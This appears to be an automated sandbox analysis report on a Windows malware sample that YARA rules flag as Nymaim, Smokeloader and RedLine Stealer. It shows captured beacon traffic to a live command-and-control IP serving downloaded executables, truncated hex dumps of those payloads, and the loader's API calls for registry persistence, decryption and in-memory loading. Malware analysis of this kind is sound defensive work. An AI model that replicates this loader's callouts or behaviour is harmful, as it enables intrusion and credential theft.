Nov 29, 2024 19:50:08.093939066 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 18:50:07 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Nov 29, 2024 19:50:10.123012066 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.72.65 Connection: Keep-Alive Cache-Control: no-cache
Nov 29, 2024 19:50:10.687839031 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 18:50:10 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Nov 29, 2024 19:50:12.716964006 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.72.65 Connection: Keep-Alive Cache-Control: no-cache
Nov 29, 2024 19:50:13.282010078 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 18:50:12 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Nov 29, 2024 19:50:15.311238050 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.72.65 Connection: Keep-Alive Cache-Control: no-cache
Nov 29, 2024 19:50:15.878643036 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 18:50:15 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Nov 29, 2024 19:50:17.904297113 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.72.65 Connection: Keep-Alive Cache-Control: no-cache
Nov 29, 2024 19:50:18.469189882 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 18:50:18 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Nov 29, 2024 19:50:20.498091936 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.72.65 Connection: Keep-Alive Cache-Control: no-cache
Nov 29, 2024 19:50:21.061618090 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 18:50:20 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Nov 29, 2024 19:50:23.076097965 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.72.65 Connection: Keep-Alive Cache-Control: no-cache
Nov 29, 2024 19:50:23.647859097 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 18:50:23 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Nov 29, 2024 19:50:25.669894934 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.72.65 Connection: Keep-Alive Cache-Control: no-cache
Nov 29, 2024 19:50:26.242357016 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 18:50:25 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Nov 29, 2024 19:50:28.263925076 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.72.65 Connection: Keep-Alive Cache-Control: no-cache
Nov 29, 2024 19:50:28.829091072 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 18:50:28 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Nov 29, 2024 19:50:30.857647896 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.72.65 Connection: Keep-Alive Cache-Control: no-cache
Nov 29, 2024 19:50:31.469352961 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 18:50:31 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Nov 29, 2024 19:50:34.529557943 CET	394	OUT	GET /soft/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: d Host: 185.156.72.65 Connection: Keep-Alive Cache-Control: no-cache
Nov 29, 2024 19:50:35.321969032 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 18:50:34 GMT Server: Apache/2.4.52 (Ubuntu) Content-Disposition: attachment; filename="dll"; Content-Length: 242176 Keep-Alive: timeout=5, max=86 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}:s(2rp(;&Vrprp(>}(Co(D(E}(F(E(G&>}(Co(D}(F(E(H&">}R} { oo{ "}!{!}{#{op{,{ oo{!oo{*Bsu
Nov 29, 2024 19:50:35.909614086 CET	394	OUT	GET /soft/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: s Host: 185.156.72.65 Connection: Keep-Alive Cache-Control: no-cache
Nov 29, 2024 19:50:36.819996119 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 18:50:36 GMT Server: Apache/2.4.52 (Ubuntu) Content-Disposition: attachment; filename="soft"; Content-Length: 1502720 Keep-Alive: timeout=5, max=85 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_"00O `@ @`LOO` 0O H.text/ 0 `.rsrc`2@@.reloc @BOHh~DU ((~-rp(os~~j(r=p~otj(rMp~otj(rp~otj(rp~otj(rp~otj(rp~otj(rp~ot~(Vs(tN(((0f(8Mo9:oo-a

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 7312, Parent PID: 4056

General

Target ID:	0
Start time:	13:49:55
Start date:	29/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	1'998'848 bytes
MD5 hash:	F7DE1701682B8875C140E8D55B51B2D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000003.1259267690.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1949284118.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 5732, Parent PID: 7312

General

Target ID:	13
Start time:	15:13:20
Start date:	29/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7312 -s 644
Imagebase:	0x870000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: file.exePID: 7312, Parent PID: 4056COMMON

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	11.3%
Signature Coverage:	56.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	22

Executed Functions

Function 00403D40 Relevance: 56.1, APIs: 25, Strings: 6, Instructions: 1839sleepcomCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104,?,A5E27AAC,771B0F00,00000000), ref: 00403DAA
CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403F39
Sleep.KERNEL32(000003E8), ref: 00403F42
__Init_thread_footer.LIBCMT ref: 00404517
__Init_thread_footer.LIBCMT ref: 004046DD
SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 004048E7
__Init_thread_footer.LIBCMT ref: 00404975
__Init_thread_footer.LIBCMT ref: 00404BDE
CoInitialize.OLE32(00000000), ref: 00404C5F
CoCreateInstance.OLE32(0041F290,00000000,00000001,0041F260,?,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404C7A
__Init_thread_footer.LIBCMT ref: 004050DD
Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
__Init_thread_footer.LIBCMT ref: 004053EB
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404CE8

Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,A5E27AAC), ref: 00410837
Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856

CoUninitialize.COMBASE(?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71,?,?,?,?,00000000,0042D9A0), ref: 00404D21
CoUninitialize.OLE32(?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404DE4
CoUninitialize.OLE32(?,?,?,?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404E65
__Init_thread_footer.LIBCMT ref: 00404046

Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F

Part of subcall function 00402220: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402256
Part of subcall function 00402220: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402277
Part of subcall function 00402220: CloseHandle.KERNEL32(00000000), ref: 0040227E

__Init_thread_footer.LIBCMT ref: 00404222

Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D

Strings

SUB=, xrefs: 00405AB8
Y@BA, xrefs: 00404660
rmBK, xrefs: 004048FA
ZK\., xrefs: 00404B8B
get, xrefs: 00405EB1
O@K\, xrefs: 00404904

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Init_thread_footer$CriticalSection$CreateFileUninitialize$EnterLeavePathSleepTime$ByteCharCloseConditionDirectoryFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@VariableWakeWideWrite__ehfuncinfo$??2@
String ID: O@K\$SUB=$Y@BA$ZK\.$get$rmBK
API String ID: 995133137-4217594176
Opcode ID: fc296b8ebabf87ab453db46733e4af5c0f90cf00110a11acb1cebe7bac2205c4
Instruction ID: 6a8ba5f9be4b72ae1469cca8882757b6bc7ac7481bdf7cf44a4378d84f27710c
Opcode Fuzzy Hash: fc296b8ebabf87ab453db46733e4af5c0f90cf00110a11acb1cebe7bac2205c4
Instruction Fuzzy Hash: 44F2DFB0E042549BDB24DF24DC48B9EBBB0EF45304F5442E9E5097B2D2DB78AA84CF59

Function 00404F70 Relevance: 40.1, APIs: 16, Strings: 6, Instructions: 1645sleepregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,A5E27AAC), ref: 00410837
Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856

Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D

__Init_thread_footer.LIBCMT ref: 004050DD
Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
__Init_thread_footer.LIBCMT ref: 004053EB
Sleep.KERNEL32(000007D0), ref: 00405755
Sleep.KERNEL32(000007D0), ref: 0040576F
CoUninitialize.OLE32(?,?,0042DC19,?,?,?,?,?,?,?,?,?,?,00000000,0042DBDD), ref: 004057A5
CoUninitialize.OLE32(?,?,?,?,?,0042DC19,?,?,?,?,?,?,?), ref: 004057D1
RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
Sleep.KERNEL32(000003E8), ref: 00405AB0

Strings

u%, xrefs: 00406936
SUB=, xrefs: 00405AB8
@BAO, xrefs: 0040537C
get, xrefs: 00405EB1
mixone, xrefs: 00406239
updateSW, xrefs: 0040567B

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Sleep$CriticalInit_thread_footerSectionTimeUninitialize$CloseCreateEnterFileLeaveOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
String ID: @BAO$SUB=$get$mixone$updateSW$u%
API String ID: 606935701-4262164818
Opcode ID: 2675d1e0df0572c272326b90cc376ba1d1ddc9910572af857a67036b4fb5b0b8
Instruction ID: 5b15cd53af07887682d130406d81e99ec93c25d434b47868d83c22c89ba1756f
Opcode Fuzzy Hash: 2675d1e0df0572c272326b90cc376ba1d1ddc9910572af857a67036b4fb5b0b8
Instruction Fuzzy Hash: BBD20271D001149BDB18EB24CD49BAEBB75AF01304F5441BEE8097B2D2DB78AE85CF99

Function 00402EE0 Relevance: 33.7, APIs: 11, Strings: 8, Instructions: 454
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetLastError.KERNEL32(0000000D), ref: 00402F02
SetLastError.KERNEL32(000000C1), ref: 00402F44

Strings

ERROR_OUTOFMEMORY!, xrefs: 00403062
Section alignment invalid!, xrefs: 00402FC7
alignedImageSize != AlignValueUp!, xrefs: 0040302C
DOS header size is not valid!, xrefs: 00402F71
Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402FA1
FileHeader.Machine != HOST_MACHINE!, xrefs: 00402FB3
Size is not valid!, xrefs: 00402F08
DOS header is not valid!, xrefs: 00402F32

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID: DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
API String ID: 1452528299-2436911586
Opcode ID: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
Instruction ID: feefb59cb084f329bf9f2ee3fcaf904be4f7c95626e3fbc9d9f9d2488596d2a7
Opcode Fuzzy Hash: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
Instruction Fuzzy Hash: C3F1AC71B00205ABCB10CF69D985BAAB7B4BF48705F14407AE909EB6C1D779ED11CB98

Function 004035D0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,A5E27AAC), ref: 00403650
CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403674
CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004036DE
GetLastError.KERNEL32 ref: 004036E8
CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403710
GetLastError.KERNEL32 ref: 0040371A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040372A
CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004037EC
CryptDestroyKey.ADVAPI32(?), ref: 0040385E

Strings

Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040362C

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 3761881897-63410773
Opcode ID: 7cda3253fc6564296fb6cb8a200b00d8bf0f12f9b8f76da2c3a0b6ecf6ba6fe9
Instruction ID: 2781db946ec69ebb5a82e2500c6cd73aae13b8bfd69ebbb4ddbc14150c00f762
Opcode Fuzzy Hash: 7cda3253fc6564296fb6cb8a200b00d8bf0f12f9b8f76da2c3a0b6ecf6ba6fe9
Instruction Fuzzy Hash: DF819F71A00218AFEF209F25CC45B9ABBB9FF49300F1481BAF50DA7291DB359E858F55

Function 00402A50 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 00402AF8
GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402B0D
FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402B1B
LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402B36
OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402B55
LocalFree.KERNEL32(00000000), ref: 00402B62
LocalFree.KERNEL32(?), ref: 00402B67

Strings

%s: %s, xrefs: 00402B46
Error protecting memory page, xrefs: 00402B41

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
String ID: %s: %s$Error protecting memory page
API String ID: 839691724-1484484497
Opcode ID: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
Instruction ID: 7115b4f99f47229cfead79ad45df677009e1c347b6b4b41756aa32ea0cb5f428
Opcode Fuzzy Hash: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
Instruction Fuzzy Hash: A0311431B00104AFDB10DF58DD45FAAB7A8EF48704F4541BAE905EB2D2DB79AD06CB98

Function 00401970 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 293
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401A05
InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401A28

Strings

text, xrefs: 00401B8F

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: FileInternet$PointerRead
String ID: text
API String ID: 3197321146-999008199
Opcode ID: 053bcbbc951b0f6e2e3539fc5c0c96396c3859489272e4824dfa28b8d36ca5fc
Instruction ID: 56e9ac6e571947bcf275884445d614b5348a2aaf1a2f7cc802118cd3fea156c2
Opcode Fuzzy Hash: 053bcbbc951b0f6e2e3539fc5c0c96396c3859489272e4824dfa28b8d36ca5fc
Instruction Fuzzy Hash: 10C13970A002189FDB24DF54CC85BE9B7B5EF49304F1041EAE409B72A1DB78AE95CF99

Function 04948464 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0494848C
Module32First.KERNEL32(00000000,00000224), ref: 049484AC

Memory Dump Source

Source File: 00000000.00000002.1949284118.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4940000_file.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 96a7bf895b092a66fb1c6e38c94aae0641becaa6e582f32b83610608cd176f63
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 9BF062391007117BE7207BB9DC8CE6E76EDAF89665F100639E642954C0DB74F8454661

Function 004087E0 Relevance: 2.5, Strings: 2, Instructions: 26COMMON

Download Yara Rule

Strings

mixtwo, xrefs: 004087FD
nosub, xrefs: 004087EE

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

